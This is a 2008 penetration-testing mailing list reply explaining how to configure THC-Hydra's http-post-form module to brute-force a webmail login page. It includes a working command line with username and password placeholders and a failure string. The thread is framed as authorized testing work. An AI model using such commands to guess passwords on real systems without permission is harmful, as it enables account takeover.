Penetration Testing mailing list archives

Re: THC-Hydra web form attack

From: pentest () eternalrealm net
Date: Thu, 22 May 2008 00:42:31 +0200

On Tue, 20 May 2008, Application Tester wrote:

How to do a web form attack from command line hydra. I have a webmail 
(/webmail/src/login.php) to crack passwords as part of my PT.

I have tried the following but failed.

hydra -l username -P dictionary.txt  -o output.txt -t 4  mydomainname.com  
http-post-form -m /webmail/src/login.php
Hydra (http://www.thc.org) starting at 2008-05-20 11:53:41
[DATA] 4 tasks, 1 servers, 213560 login tries (l:1/p:213560), ~53390 tries 
per task
[DATA] attacking service http-post-form on port 80
select: Bad file descriptor


Hi,

you need to specify into which parameters of login.php hydra should
insert the username and passwords.

If you take a look at the README file distributed with hydra you'll
notice that the http-post-form module parametrization uses the following
syntax:

<url>:<form parameters>:<failure string>

Within the form parameters the keywords "^USER^" and "^PASS^" are used
to mark the positions where the username and passwords you supplied will
be inserted.

Assuming that the parameters of your login.php script are named
"username" and "password" and the response to a failed login contains
the string "failure" you could use a parametrization like

hydra -l username -P dictionary.txt -o output.txt -t 4 mydomainname.com
http-post-form
"/webmail/src/login.php:username=^USER^&password=^PASS^:failure"

Take a look at the README and the source code of the http-form-post
module (hydra-http-form.c) for further information.

Furthermore there is a patch available for this hydra module which is
supposed to fix a bug concerning calls of free().
Refer to the description of the hydra-http-form-patch at
http://packetstorm.linuxsecurity.com/groups/thc/indexdate.html
Patch link:
http://packetstorm.linuxsecurity.com/groups/thc/hydra-http-form.patch

tic


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes 
in Securing Web Applications  
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------

Current thread:

THC-Hydra web form attack Application Tester (May 21)
- Re: THC-Hydra web form attack Ulises2k (May 22)
- Re: THC-Hydra web form attack Rodrigo Montoro(Sp0oKeR) (May 22)
- Re: THC-Hydra web form attack pentest (May 22)